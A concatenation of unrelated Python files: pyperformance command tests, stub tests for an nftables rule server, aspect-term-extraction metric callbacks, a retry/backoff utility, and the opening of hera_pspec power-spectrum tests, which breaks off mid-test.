        expect_success('venv', 'show', '--venv', root)
    ###################################
    # run
    def test_run_and_show(self):
        filename = self.resolve_tmp('bench.json')
        # -b all: check that *all* benchmark work
        #
        # --debug-single-value: benchmark results don't matter, we only
        # check that running benchmarks don't fail.
        # XXX Capture and check the output.
        text = self.run_pyperformance(
            'run',
            '-b', 'all',
            '--debug-single-value',
            '-o', filename,
            capture=None,
        )
        # Display slowest benchmarks
        # XXX Capture and check the output.
        self.run_module('pyperf', 'slowest', filename)
    ###################################
    # compile
    def ensure_cpython_repo(self, reporoot=None):
        """Return a path to a cpython checkout, cloning it if necessary."""
        if not reporoot:
            reporoot = os.environ.get('PYPERFORMANCE_TESTS_CPYTHON')
            if not reporoot:
                reporoot = os.path.join(tests.DATA_DIR, 'cpython')
        # Marker files prove the checkout is present and populated.
        for markerfile in [
            os.path.join(reporoot, '.git'),
            os.path.join(reporoot, 'Python/ceval.c'),
        ]:
            if not os.path.exists(markerfile):
                break
        else:
            return reporoot
        # Clone the repo.
        print('#'*40)
        print('# cloning the cpython repo')
        print('#'*40)
        print()
        tests.run_cmd(
            shutil.which('git'),
            'clone',
            'https://github.com/python/cpython',
            reporoot,
        )
        print('#'*40)
        print('# DONE: cloning the cpython repo')
        print('#'*40)
        print()
        return reporoot
    def create_compile_config(self, *revisions,
                              outdir=None,
                              fast=True,
                              upload=None,
                              ):
        """Write a compile.ini for the given revisions and return its path.

        fast=True disables LTO/PGO and enables debug builds so tests run
        quickly."""
        if not outdir:
            outdir = self.resolve_tmp('compile-cmd-outdir', unique=True)
        cpython = self.ensure_cpython_repo()
        text = textwrap.dedent(f'''
            [config]
            json_dir = {outdir}
            debug = {fast}
            [scm]
            repo_dir = {cpython}
            update = False
            git_remote = remotes/origin
            [compile]
            bench_dir = {outdir}
            lto = {not fast}
            pgo = {not fast}
            install = True
            [run_benchmark]
            system_tune = False
            upload = False
            [upload]
            url = {upload}
            ''')
        if revisions:
            text += ''.join(line + os.linesep for line in [
                '',
                '[compile_all_revisions]',
                *(f'{r} =' for r in revisions),
            ])
        cfgfile = os.path.join(outdir, 'compile.ini')
        print(f'(writing config file to {cfgfile})')
        os.makedirs(outdir, exist_ok=True)
        with open(cfgfile, 'w', encoding='utf-8') as outfile:
            outfile.write(text)
        return cfgfile
    @tests.CPYTHON_ONLY
    @tests.NON_WINDOWS_ONLY
    @tests.SLOW
    def test_compile(self):
        cfgfile = self.create_compile_config()
        revision = 'a58ebcc701dd'  # tag: v3.10.2
        # XXX Capture and check the output.
        self.run_pyperformance(
            'compile', cfgfile, revision,
            capture=None,
        )
    @tests.CPYTHON_ONLY
    @tests.NON_WINDOWS_ONLY
    @tests.SLOW
    def test_compile_all(self):
        rev1 = '2cd268a3a934'  # tag: v3.10.1
        rev2 = 'a58ebcc701dd'  # tag: v3.10.2
        cfgfile = self.create_compile_config(rev1, rev2)
        # XXX Capture and check the output.
        self.run_pyperformance(
            'compile_all', cfgfile,
            capture=None,
        )
    @tests.CPYTHON_ONLY
    @tests.NON_WINDOWS_ONLY
    @unittest.expectedFailure
    def test_upload(self):
        # Upload target is deliberately bogus; the command must fail.
        url = '<bogus>'
        cfgfile = self.create_compile_config(upload=url)
        resfile = os.path.join(tests.DATA_DIR, 'py36.json')
        # XXX Capture and check the output.
        self.run_pyperformance(
            'upload', cfgfile, resfile,
            capture=None,
        )
    ###################################
    # show
    def test_show(self):
        for filename in (
            os.path.join(tests.DATA_DIR, 'py36.json'),
            os.path.join(tests.DATA_DIR, 'mem1.json'),
        ):
            with self.subTest(filename):
                # XXX Capture and check the output.
                self.run_pyperformance('show', filename, capture=None)
    ###################################
    # compare
    def compare(self, *args,
                exitcode=0,
                dataset='py',
                file2='py38.json',
                **kw
                ):
        """Run ``pyperformance compare`` on a fixture pair and return the
        output from the first filename marker onward (plus a newline)."""
        if dataset == 'mem':
            file1 = 'mem1.json'
            file2 = 'mem2.json'
        else:
            file1 = 'py36.json'
        marker = file1
        stdout = self.run_pyperformance(
            'compare',
            os.path.join(tests.DATA_DIR, file1),
            os.path.join(tests.DATA_DIR, file2),
            *args,
            exitcode=exitcode,
            verbose=False,
        )
        # Strip any leading noise before the report proper.
        if marker in stdout:
            stdout = stdout[stdout.index(marker):]
        return stdout + '\n'
    def test_compare(self):
        stdout = self.compare()
        self.assertEqual(stdout, textwrap.dedent('''
            py36.json
            =========
            Performance version: 1.0.1
            Python version: 3.6.10 (64-bit)
            Report on Linux-5.5.9-200.fc31.x86_64-x86_64-with-fedora-31-Thirty_One
            Number of logical CPUs: 8
            Start date: 2020-03-26 15:50:39.816020
            End date: 2020-03-26 15:50:56.406559
            py38.json
            =========
            Performance version: 1.0.1
            Python version: 3.8.2 (64-bit)
            Report on Linux-5.5.9-200.fc31.x86_64-x86_64-with-glibc2.2.5
            Number of logical CPUs: 8
            Start date: 2020-03-26 15:54:12.331569
            End date: 2020-03-26 15:54:23.900355
            ### telco ###
            Mean +- std dev: 10.7 ms +- 0.5 ms -> 7.2 ms +- 0.3 ms: 1.49x faster
            Significant (t=44.97)
            ''').lstrip())
    def test_compare_wrong_version(self):
        # Comparing incompatible result-format versions must fail (exit 1).
        stdout = self.compare(file2='py3_performance03.json', exitcode=1)
        self.assertEqual(stdout, textwrap.dedent('''
            py36.json
            =========
            Performance version: 1.0.1
            Python version: 3.6.10 (64-bit)
            Report on Linux-5.5.9-200.fc31.x86_64-x86_64-with-fedora-31-Thirty_One
            Number of logical CPUs: 8
            Start date: 2020-03-26 15:50:39.816020
            End date: 2020-03-26 15:50:56.406559
            py3_performance03.json
            ======================
            Performance version: 0.3
            Skipped 1 benchmarks only in py36.json: telco
            Skipped 1 benchmarks only in py3_performance03.json: call_simple
            ERROR: Performance versions are different (1.0.1 != 0.3)
            ''').lstrip())
    def test_compare_single_value(self):
        stdout = self.compare(dataset='mem')
        self.assertEqual(stdout, textwrap.dedent('''
            mem1.json
            =========
            Performance version: 0.2
            mem2.json
            =========
            Performance version: 0.2
            ### call_simple ###
            7896.0 kB -> 7900.0 kB: 1.00x larger
            ''').lstrip())
    def test_compare_csv(self):
        expected = textwrap.dedent('''
            Benchmark,Base,Changed
            telco,0.01073,0.00722
            ''').lstrip()
        filename = self.resolve_tmp('outfile.csv', unique=True)
        with tests.CleanupFile(filename):
            self.compare("--csv", filename)
            with open(filename, "r", encoding="utf-8") as infile:
                csv = infile.read()
        self.assertEqual(csv, expected)
    def test_compare_table(self):
        stdout = self.compare("-O", "table")
        self.assertEqual(stdout, textwrap.dedent('''
            py36.json
            =========
            Performance version: 1.0.1
            Python version: 3.6.10 (64-bit)
            Report on Linux-5.5.9-200.fc31.x86_64-x86_64-with-fedora-31-Thirty_One
            Number of logical CPUs: 8
            Start date: 2020-03-26 15:50:39.816020
            End date: 2020-03-26 15:50:56.406559
            py38.json
            =========
            Performance version: 1.0.1
            Python version: 3.8.2 (64-bit)
            Report on Linux-5.5.9-200.fc31.x86_64-x86_64-with-glibc2.2.5
            Number of logical CPUs: 8
            Start date: 2020-03-26 15:54:12.331569
            End date: 2020-03-26 15:54:23.900355
            +-----------+-----------+-----------+--------------+-----------------------+
            | Benchmark | py36.json | py38.json | Change       | Significance          |
            +===========+===========+===========+==============+=======================+
            | telco     | 10.7 ms   | 7.22 ms   | 1.49x faster | Significant (t=44.97) |
            +-----------+-----------+-----------+--------------+-----------------------+
            ''').lstrip())
    def test_compare_table_single_value(self):
        stdout = self.compare("-O", "table", dataset='mem')
        self.assertEqual(stdout, textwrap.dedent('''
            mem1.json
            =========
            Performance version: 0.2
            mem2.json
            =========
            Performance version: 0.2
            +-------------+-----------+-----------+--------------+------------------------------------------+
            | Benchmark   | mem1.json | mem2.json | Change       | Significance                             |
            +=============+===========+===========+==============+==========================================+
            | call_simple | 7896.0 kB | 7900.0 kB | 1.00x larger | (benchmark only contains a single value) |
            +-------------+-----------+-----------+--------------+------------------------------------------+
            ''').lstrip())
if __name__ == "__main__":  # allow running this test module directly
    unittest.main()
|
11520369
|
import json
import os
import unittest
import tempfile
from flask import jsonify
import app as nftserver
from utils import nft_utils
class NFTServerCreateRuleTests(unittest.TestCase):
    """Rule-creation tests for the NFT server API.

    NOTE(review): every test body is a bare ``assert True`` - these are
    placeholder stubs awaiting real implementations.
    """
    def setUp(self):
        # Use Flask's test client against the app in testing mode.
        nftserver.app.config['TESTING'] = True
        self.app = nftserver.app.test_client()
    def tearDown(self):
        # Reset nftables state so tests stay independent of each other.
        cmd = nft_utils.nft_command('flush ruleset')
        nft_utils.close_nft_command(cmd)
    def test_rule_creation_with_match(self):
        assert True
    def test_rule_creation_with_set(self):
        assert True
    def test_rule_creation_with_dictionary(self):
        assert True
    def test_no_rule_creation_with_empty_chain(self):
        assert True
    def test_no_rule_creation_with_nonexistent_chain(self):
        assert True
    def test_no_rule_creation_with_empty_expression(self):
        assert True
    def test_no_rule_creation_with_invalid_expression(self):
        assert True
    def test_no_rule_creation_with_empty_key(self):
        assert True
    def test_no_rule_creation_with_invalid_key(self):
        assert True
    def test_no_rule_creation_with_empty_statements(self):
        assert True
    def test_no_rule_creation_with_statement_with_empty_match(self):
        assert True
    def test_no_rule_creation_with_statement_with_invalid_match(self):
        assert True
    def test_no_rule_creation_with_statement_with_empty_action(self):
        assert True
    def test_no_rule_creation_with_statement_with_invalid_action(self):
        assert True
class NFTServerListRuleTests(unittest.TestCase):
    """Rule-listing tests for the NFT server API (placeholder stubs)."""
    def setUp(self):
        # Use Flask's test client against the app in testing mode.
        nftserver.app.config['TESTING'] = True
        self.app = nftserver.app.test_client()
    def tearDown(self):
        # Reset nftables state so tests stay independent of each other.
        cmd = nft_utils.nft_command('flush ruleset')
        nft_utils.close_nft_command(cmd)
    def test_list_all_rules(self):
        assert True
    def test_list_single_rule(self):
        assert True
class NFTServerDeleteRuleTests(unittest.TestCase):
    """Rule-deletion tests for the NFT server API (placeholder stub)."""
    def setUp(self):
        # Use Flask's test client against the app in testing mode.
        nftserver.app.config['TESTING'] = True
        self.app = nftserver.app.test_client()
    def tearDown(self):
        # Reset nftables state so tests stay independent of each other.
        cmd = nft_utils.nft_command('flush ruleset')
        nft_utils.close_nft_command(cmd)
    def test_rule_deletion(self):
        assert True
if __name__ == '__main__':  # allow running this test module directly
    unittest.main()
|
11520419
|
import logging
from typing import List
import numpy as np
import tensorflow as tf
from transformers_keras.common.metrics import ExactMatch, F1ForSequence
from transformers_keras.datapipe.sa_dataset import DatasetForAspectTermExtraction, ExampleForAspectTermExtraction
class BaseMetricForAspectTermExtraction(tf.keras.callbacks.Callback):
    """Base metric callback for Aspect Term Extraction (ATE).

    At the end of each epoch, predicts start/end pointer sequences for the
    held-out examples, decodes them into aspect-term spans and passes the
    gold and predicted span lists to ``_compute_metric`` (implemented by
    subclasses).
    """

    @classmethod
    def from_jsonl_files(cls, input_files, limit=None, **kwargs):
        """Build the callback from JSONL files, keeping only the first
        *limit* examples when a positive limit is given."""
        examples = DatasetForAspectTermExtraction.jsonl_to_examples(input_files, **kwargs)
        if limit is not None and limit > 0:
            examples = examples[:limit]
        return cls(examples, **kwargs)

    def __init__(self, examples: List[ExampleForAspectTermExtraction], **kwargs):
        super().__init__()
        self.examples = examples
        self.dataset = DatasetForAspectTermExtraction.from_examples(self.examples, **kwargs)

    def on_epoch_end(self, epoch, logs=None):
        """Predict on the evaluation dataset and report the metric."""
        outputs = self.model.predict(self.dataset)
        all_start_ids, all_end_ids = outputs[0], outputs[1]
        pred_spans_list, gold_spans_list = [], []
        for start_ids, end_ids, example in zip(all_start_ids, all_end_ids, self.examples):
            # Collapse per-position logits into hard 0/1 pointer decisions.
            start_ids, end_ids = np.argmax(start_ids, axis=-1), np.argmax(end_ids, axis=-1)
            pred_spans_list.append(self._decode_spans(start_ids.tolist(), end_ids.tolist(), example))
            gold_spans_list.append(self._decode_spans(example.start_ids, example.end_ids, example))
        self._compute_metric(gold_spans_list, pred_spans_list, epoch=epoch)

    def _compute_metric(self, gold_spans_list, pred_spans_list, epoch=0):
        """Hook for subclasses: compute and report the actual metric."""
        pass

    def _decode_spans(self, start_ids, end_ids, example):
        """Turn 0/1 start/end pointer sequences into surface-form spans.

        Tokens inside a span are concatenated with their WordPiece
        continuation marker ("##" prefix) removed.
        """
        spans = []
        span = []
        for idx, (start, end) in enumerate(zip(start_ids, end_ids)):
            if start == 1:
                span = [idx]
            if span and end == 1:
                span.append(idx)
                # BUG FIX: the original used str(x).lstrip("##"), but lstrip
                # takes a *character set* and strips ANY run of leading '#'
                # characters, corrupting tokens that legitimately start with
                # '#'. Strip exactly one "##" prefix instead.
                pieces = []
                for tok in example.tokens[span[0] : span[1] + 1]:
                    tok = str(tok)
                    pieces.append(tok[2:] if tok.startswith("##") else tok)
                spans.append("".join(pieces))
                span = []
        return spans
class EMForAspectTermExtraction(BaseMetricForAspectTermExtraction):
    """Exact-match metric callback for aspect term extraction."""

    def __init__(self, examples: List[ExampleForAspectTermExtraction], **kwargs) -> None:
        super().__init__(examples, **kwargs)
        self.em = ExactMatch()

    def _compute_metric(self, gold_spans_list, pred_spans_list, epoch=0):
        # Score the decoded spans, then report to both the log and TensorBoard.
        em_score = self.em(gold_spans_list, pred_spans_list, dim=2)
        logging.info("Epoch: %d, EM: %.6f", epoch, em_score)
        tf.summary.scalar("EM", em_score, description="EM score")
class F1ForAspectTermExtraction(BaseMetricForAspectTermExtraction):
    """Sequence-level F1 metric callback for aspect term extraction."""

    def __init__(self, examples: List[ExampleForAspectTermExtraction], split_whitespace=False, **kwargs):
        super().__init__(examples, **kwargs)
        # Whether spans are tokenized on whitespace before matching.
        self.split_whitespace = split_whitespace
        self.f1 = F1ForSequence()

    def _compute_metric(self, gold_spans_list, pred_spans_list, epoch=0):
        # Score the decoded spans, then report to both the log and TensorBoard.
        f1_score = self.f1(gold_spans_list, pred_spans_list, dim=2, split_whitespace=self.split_whitespace)
        logging.info("Epoch: %d, F1: %.6f", epoch, f1_score)
        tf.summary.scalar("F1", f1_score, description="F1 score")
|
11520424
|
import datetime
import functools
import inspect
import random
import time
import six
# Default retry/backoff configuration shared by Retry and
# truncated_delay_generator (delays in seconds).
_DEFAULT_RETRIES = 3
_DEFAULT_DELAY_INITIAL = 0.1
_DEFAULT_DELAY_MULTIPLIER = 2.0
_DEFAULT_DELAY_MAXIMUM = 60
_DEFAULT_DELAY_JITTER = (0, 1)
# Attributes safe to copy in six.wraps() for callables that may lack
# __name__/__module__ (e.g. functools.partial objects) - see _wraps().
_SAFE_VALID_ASSIGNMENTS = ("__doc__",)
def _name_of_func(f):
module = inspect.getmodule(f)
if module is not None:
module = module.__name__
else:
module = "<unknown>"
return "{}.{}".format(module, getattr(f, "__name__", f))
class Retry(object):
    """
    Retry class to wrap functions as a decorator or inline.
    Example
    -------
    >>> import descarteslabs as dl
    >>> retry = dl.common.retry.Retry(
    ...     maximum=30,
    ...     retries=5,
    ...     exceptions=(dl.client.exceptions.GatewayTimeoutError,)
    ... )
    >>> @retry
    ... def flaky(x):
    ...    return x
    >>> flaky("test")
    'test'
    >>> retry(lambda x: x)("test")
    'test'
    """

    def __init__(
        self,
        retries=_DEFAULT_RETRIES,
        exceptions=None,
        predicate=None,
        blacklist=None,
        deadline=None,
        initial=_DEFAULT_DELAY_INITIAL,
        maximum=_DEFAULT_DELAY_MAXIMUM,
        jitter=_DEFAULT_DELAY_JITTER,
        multiplier=_DEFAULT_DELAY_MULTIPLIER,
    ):
        """
        Instantiate a Retry object that can be used to wrap a callable.
        Parameters
        ----------
        retries : int, optional
            The number of retries allowed.
        exceptions : tuple, optional
            A tuple of Exceptions that should always be retried.
        predicate : function, optional
            A callable that takes an exception and returns true if retryable.
            This can be used for cases where a generic exception type is
            raised with variable attributes.
        blacklist : tuple, optional
            A tuple of Exceptions that should never be retried.
        deadline : float, optional
            The deadline in seconds for retries.
        initial : float
            The amount of delay for the before the first retry.
        maximum : float
            The maximum amount of delay between retries.
        jitter : tuple, optional
            The bounds for a random amount to be added to each delay.
        multiplier : float, optional
            The multiple by which the delay increases.
        """
        self._retries = retries
        self._exceptions = exceptions
        self._predicate = predicate
        self._blacklist = blacklist
        self._deadline = deadline
        self._initial = initial
        self._maximum = maximum
        self._jitter = jitter
        self._multiplier = multiplier

    def __call__(self, func):
        """Wrap *func* so every call is retried per this object's policy."""
        @_wraps(func)
        def wrapper(*args, **kwargs):
            target = functools.partial(func, *args, **kwargs)
            delay_generator = truncated_delay_generator(
                initial=self._initial,
                maximum=self._maximum,
                jitter=self._jitter,
                multiplier=self._multiplier,
            )
            return self._retry(target, delay_generator)
        return wrapper

    def _retry(self, func, delay_generator):
        """Call *func* until it succeeds, retries/deadline run out, or a
        non-retryable exception is raised."""
        deadline = self._deadline_datetime(self._deadline)
        retries = self._retries
        previous_exceptions = []
        for delay in delay_generator:
            try:
                return func()
            except Exception as e:
                # Re-raises immediately if the exception is not retryable.
                self._handle_exception(e, previous_exceptions)
            # will raise RetryError if deadline or retries exceeded
            retries = self._check_retries(
                retries, _name_of_func(func), deadline, previous_exceptions
            )
            time.sleep(delay)
        else:
            # The delay generator is expected to be infinite.
            raise ValueError("Bad delay generator")

    def _handle_exception(self, exception, previous_exceptions):
        """Re-raise *exception* unless the retry policy allows retrying it;
        otherwise record it for later reporting."""
        if callable(self._predicate) and not self._predicate(exception):
            raise
        if self._blacklist is not None and isinstance(exception, self._blacklist):
            raise
        if self._exceptions is not None and not isinstance(exception, self._exceptions):
            raise
        previous_exceptions.append(exception)

    def _check_retries(self, retries, name, deadline, previous_exceptions):
        """Enforce the deadline and retry budget.

        Raises RetryError (chained to the last exception) when either is
        exhausted; otherwise returns the decremented retry count.
        """
        # Raise RetryError if deadline exceeded
        if deadline is not None and deadline <= datetime.datetime.utcnow():
            # BUG FIX: the original formatted the *deadline datetime* with
            # "{:.1f}", which raises TypeError at the moment the error
            # should be reported. Report the configured deadline (seconds).
            six.raise_from(
                RetryError(
                    "Deadline of {:.1f}s exceeded while calling {}".format(
                        self._deadline, name
                    ),
                    previous_exceptions,
                ),
                previous_exceptions[-1],
            )
        # Raise RetryError if retries exhausted
        if retries is not None and retries == 0:
            six.raise_from(
                RetryError(
                    "Maximum retry attempts calling {}".format(name),
                    previous_exceptions,
                ),
                previous_exceptions[-1],
            )
        if retries is not None:
            retries -= 1
        return retries

    @staticmethod
    def _deadline_datetime(deadline):
        """Convert a deadline in seconds to an absolute UTC datetime."""
        if deadline is None:
            return None
        return datetime.datetime.utcnow() + datetime.timedelta(seconds=deadline)
class RetryError(Exception):
    """
    Error raised when the number of retries has been exhausted or the
    deadline has passed.
    """

    def __init__(self, message, exceptions):
        super(RetryError, self).__init__(message)
        self.message = message
        # The exceptions raised by the individual attempts, in order.
        self._exceptions = exceptions

    @property
    def exceptions(self):
        """
        Get a list of exceptions that occurred.
        Returns
        -------
        list
            The list of exceptions
        """
        return self._exceptions

    def __str__(self):
        return "{}, exceptions: {}".format(self.message, self.exceptions)
def truncated_delay_generator(
    initial=None, maximum=None, jitter=None, multiplier=_DEFAULT_DELAY_MULTIPLIER
):
    """
    Yield an endless sequence of truncated-exponential backoff delays.

    Parameters
    ----------
    initial : float
        The amount of delay for the first generated value. Defaults to
        ``_DEFAULT_DELAY_INITIAL`` when ``None``.
    maximum : float
        The maximum amount of delay (cap applied after jitter).
    jitter : tuple, optional
        The (low, high) bounds for a random amount added to each delay.
    multiplier : float, optional
        The multiple by which the delay increases after each yield.
    """
    delay = _DEFAULT_DELAY_INITIAL if initial is None else initial
    while True:
        # Jitter is applied first, then the cap, so the yielded value
        # never exceeds ``maximum``.
        if jitter is not None:
            low, high = jitter
            delay += random.uniform(low, high)
        if maximum is not None and delay > maximum:
            delay = maximum
        yield delay
        delay *= multiplier
def _wraps(wrapped):
    """
    Version-tolerant stand-in for ``six.wraps``.

    ``functools.partial`` objects (and anything else without ``__name__``)
    do not carry the full set of wrapper attributes on Python 2, so fall
    back to copying only the safe subset for them.
    """
    has_name = hasattr(wrapped, "__name__")
    if not has_name or isinstance(wrapped, functools.partial):
        return six.wraps(wrapped, assigned=_SAFE_VALID_ASSIGNMENTS)
    return six.wraps(wrapped)
|
11520429
|
import unittest
import pytest
import numpy as np
import pyuvdata as uv
import os, copy, sys
from scipy.integrate import simps, trapz
from .. import pspecdata, pspecbeam, conversions, container, utils, testing
from hera_pspec.data import DATA_PATH
from pyuvdata import UVData, UVCal, utils as uvutils
from hera_cal import redcal
from scipy.signal import windows
from scipy.interpolate import interp1d
from astropy.time import Time
import warnings
import glob
from uvtools import dspec
# Data files to use in tests
# NOTE(review): the same file appears twice so the tests get two datasets to
# cross-correlate — presumably intentional; confirm against PSpecData usage.
dfiles = [
    'zen.2458042.12552.xx.HH.uvXAA',
    'zen.2458042.12552.xx.HH.uvXAA'
]
# Matching per-sample standard-deviation files (".std" variants).
dfiles_std = [
    'zen.2458042.12552.std.xx.HH.uvXAA',
    'zen.2458042.12552.std.xx.HH.uvXAA'
]
# List of tapering function to use in tests
taper_selection = ['none', 'bh7',]
#taper_selection = ['blackman', 'blackman-harris', 'gaussian0.4', 'kaiser2',
#                   'kaiser3', 'hamming', 'hanning', 'parzen']
def generate_pos_def(n):
    """
    Generate a random positive definite Hermitian matrix.

    Parameters
    ----------
    n : integer
        Size of desired matrix

    Returns
    -------
    A : array_like
        Positive definite matrix
    """
    A = np.random.normal(size=(n,n)) + 1j * np.random.normal(size=(n,n))
    A += np.conjugate(A).T
    # Shift the spectrum so the smallest eigenvalue becomes 0.01*|lambda_min|.
    # BUGFIX: the old shift of -1.01*lambda_min only worked when
    # lambda_min < 0; for a draw with lambda_min >= 0 (possible e.g. when
    # n == 1) it made the matrix indefinite. For lambda_min < 0 this shift
    # is identical to the old behavior.
    min_eig = np.min(np.linalg.eigvalsh(A))
    A += (0.01 * np.abs(min_eig) - min_eig) * np.identity(n)
    return A
def generate_pos_def_all_pos(n):
    """
    Generate a random positive definite symmetric matrix, with all entries
    positive.

    Parameters
    ----------
    n : integer
        Size of desired matrix

    Returns
    -------
    A : array_like
        Positive definite matrix
    """
    A = np.random.uniform(size=(n,n))
    A += A.T
    # Shift the spectrum so the smallest eigenvalue becomes 0.01*|lambda_min|.
    # BUGFIX: the old shift of -1.01*lambda_min assumed lambda_min < 0; for
    # n == 1 the single eigenvalue is always positive, so the old code
    # always returned a *negative* scalar. For lambda_min < 0 (the usual
    # n >= 2 case) this shift reproduces the old behavior exactly, and the
    # entries stay positive.
    min_eig = np.min(np.linalg.eigvalsh(A))
    A += (0.01 * np.abs(min_eig) - min_eig) * np.identity(n)
    return A
def diagonal_or_not(mat, places=7):
    """
    Check whether a matrix is (numerically) diagonal.

    Parameters
    ----------
    mat : array_like
        Matrix to be tested
    places : int, optional
        Decimal places used when comparing norms (default 7).

    Returns
    -------
    diag : bool
        True if matrix is diagonal
    """
    # A matrix is diagonal iff zeroing its off-diagonal entries leaves the
    # Frobenius norm unchanged (up to rounding at `places` decimals).
    diagonal_part = np.diag(np.diag(mat))
    norm_difference = np.linalg.norm(mat) - np.linalg.norm(diagonal_part)
    return round(norm_difference, places) == 0
class Test_PSpecData(unittest.TestCase):
def setUp(self):
# Instantiate empty PSpecData
self.ds = pspecdata.PSpecData()
# Load datafiles
self.d = []
for dfile in dfiles:
_d = uv.UVData()
_d.read_miriad(os.path.join(DATA_PATH, dfile))
self.d.append(_d)
# Load standard deviations
self.d_std = []
for dfile in dfiles_std:
_d = uv.UVData()
_d.read_miriad(os.path.join(DATA_PATH, dfile))
self.d_std.append(_d)
# Set trivial weights
self.w = [None for _d in dfiles]
# Load beam file
beamfile = os.path.join(DATA_PATH, 'HERA_NF_dipole_power.beamfits')
self.bm = pspecbeam.PSpecBeamUV(beamfile)
self.bm.filename = 'HERA_NF_dipole_power.beamfits'
#Load isotropic beam file
beamfile_Q = os.path.join(DATA_PATH, 'isotropic_beam.beamfits')
self.bm_Q = pspecbeam.PSpecBeamUV(beamfile_Q)
self.bm_Q.filename = 'isotropic_beam.beamfits'
# load another data file
self.uvd = uv.UVData()
self.uvd.read_miriad(os.path.join(DATA_PATH,
"zen.2458042.17772.xx.HH.uvXA"))
self.uvd_std = uv.UVData()
self.uvd_std.read_miriad(os.path.join(DATA_PATH,
"zen.2458042.17772.std.xx.HH.uvXA"))
    def tearDown(self):
        # No explicit cleanup needed: all fixtures are plain attributes that
        # setUp rebuilds from scratch for every test.
        pass
    def runTest(self):
        # Placeholder required by some unittest invocation styles; the real
        # tests are the individual test_* methods.
        pass
    def test_init(self):
        """
        PSpecData construction: input type/length validation, UVData weights,
        and label bookkeeping when adding datasets.
        """
        # Test creating empty PSpecData
        ds = pspecdata.PSpecData()
        # Test whether unequal no. of weights is picked up
        self.assertRaises( AssertionError,
                           pspecdata.PSpecData,
                           [uv.UVData(), uv.UVData(), uv.UVData()],
                           [uv.UVData(), uv.UVData()] )
        # Test passing data and weights of the wrong type
        d_arr = np.ones((6, 8))
        d_lst = [[0,1,2] for i in range(5)]
        d_float = 12.
        d_dict = {'(0,1)':np.arange(5), '(0,2)':np.arange(5)}
        self.assertRaises(TypeError, pspecdata.PSpecData, d_arr, d_arr)
        self.assertRaises(TypeError, pspecdata.PSpecData, d_lst, d_lst)
        self.assertRaises(TypeError, pspecdata.PSpecData, d_float, d_float)
        self.assertRaises(TypeError, pspecdata.PSpecData, d_dict, d_dict)
        # Test exception when not a UVData instance
        self.assertRaises(TypeError, ds.add, [1], [None])
        # Test get weights when fed a UVData for weights
        ds = pspecdata.PSpecData(dsets=[self.uvd, self.uvd], wgts=[self.uvd, self.uvd])
        key = (0, (24, 25), 'xx')
        # with the same UVData as data and weights, x() and w() must agree
        assert np.all(np.isclose(ds.x(key), ds.w(key)))
        # Test labels when adding dsets
        uvd = self.uvd
        ds = pspecdata.PSpecData()
        assert len(ds.labels) == 0
        ds.add([uvd, uvd], [None, None])
        assert len(ds.labels) == 2
        ds.add(uvd, None, labels='foo')
        assert len(ds.dsets) == len(ds.labels) == 3
        assert ds.labels == ['dset0', 'dset1', 'foo']
        ds.add(uvd, None)
        # auto-generated labels are 'dset<index>'
        assert ds.labels == ['dset0', 'dset1', 'foo', 'dset3']
        # Test some exceptions
        ds = pspecdata.PSpecData()
        # G/H cannot be computed on an empty container
        pytest.raises(ValueError, ds.get_G, key, key)
        pytest.raises(ValueError, ds.get_H, key, key)
def test_add_data(self):
"""
Test PSpecData add()
"""
uv = self.d[0]
# test adding non list objects
pytest.raises(TypeError, self.ds.add, 1, 1)
# test adding non UVData objects
pytest.raises(TypeError, self.ds.add, [1], None)
pytest.raises(TypeError, self.ds.add, [uv], [1])
pytest.raises(TypeError, self.ds.add, [uv], None, dsets_std=[1])
# test adding non UVCal for cals
pytest.raises(TypeError, self.ds.add, [uv], None, cals=[1])
# test TypeError if dsets is dict but other inputs are not
pytest.raises(TypeError, self.ds.add, {'d':uv}, [0])
pytest.raises(TypeError, self.ds.add, {'d':uv}, {'d':uv}, dsets_std=[0])
pytest.raises(TypeError, self.ds.add, {'d':uv}, {'d':uv}, cals=[0])
# specifying labels when dsets is a dict is a ValueError
pytest.raises(ValueError, self.ds.add, {'d':uv}, None, labels=['d'])
# use lists, but not appropriate lengths
pytest.raises(AssertionError, self.ds.add, [uv], [uv, uv])
pytest.raises(AssertionError, self.ds.add, [uv], None, dsets_std=[uv, uv])
pytest.raises(AssertionError, self.ds.add, [uv], None, cals=[None, None])
pytest.raises(AssertionError, self.ds.add, [uv], None, labels=['foo', 'bar'])
    def test_set_symmetric_taper(self):
        """
        Make sure that you can't set a symmetric taper with a truncated R
        matrix, and that the symmetric/asymmetric tapered R matrices match an
        independently constructed solution.
        """
        self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
        Nfreq = self.ds.spw_Nfreqs
        Ntime = self.ds.Ntimes
        Ndlys = Nfreq - 3
        self.ds.spw_Ndlys = Ndlys
        # Set baselines to use for tests
        key1 = (0, 24, 38)
        key2 = (1, 25, 38)
        key3 = [(0, 24, 38), (0, 24, 38)]
        key4 = [(1, 25, 38), (1, 25, 38)]
        # dayenu weighting needs per-key r_params before R() can be built
        rpk1 = {'filter_centers':[0.],'filter_half_widths':[100e-9],'filter_factors':[1e-9]}
        rpk2 = {'filter_centers':[0.],'filter_half_widths':[100e-9],'filter_factors':[1e-9]}
        self.ds.set_weighting('dayenu')
        self.ds.set_r_param(key1,rpk1)
        self.ds.set_r_param(key2,rpk2)
        ds1 = copy.deepcopy(self.ds)
        # Truncate the spw and extend the filter so ds1's R is non-square.
        ds1.set_spw((10,Nfreq-10))
        ds1.set_symmetric_taper(False)
        ds1.set_filter_extension([10,10])
        ds1.set_filter_extension((10,10))
        rm1 = self.ds.R(key1)
        self.ds.set_symmetric_taper(True)
        # A symmetric taper cannot be applied to a truncated R matrix.
        pytest.raises(ValueError, ds1.set_symmetric_taper, True)
        #now make sure warnings are raised when we extend filter with
        #symmetric tapering and that symmetric taper is set to false.
        with warnings.catch_warnings(record=True) as w:
            self.ds.set_filter_extension((10,10))
        assert len(w) > 0
        self.assertTrue(not(self.ds.symmetric_taper))
        """
        Now directly compare results to expectations.
        """
        self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
        Nfreq = self.ds.spw_Nfreqs
        Ntime = self.ds.Ntimes
        Ndlys = Nfreq - 3
        self.ds.spw_Ndlys = Ndlys
        key1 = (0, 24, 38)
        key2 = (1,25, 38)
        rpk1 = {'filter_centers':[0.],'filter_half_widths':[100e-9],'filter_factors':[1e-9]}
        self.ds.set_weighting('dayenu')
        self.ds.set_taper('bh7')
        self.ds.set_r_param(key1,rpk1)
        #get the symmetric tapering
        rmat_symmetric = self.ds.R(key1)
        #now set taper to be asymmetric
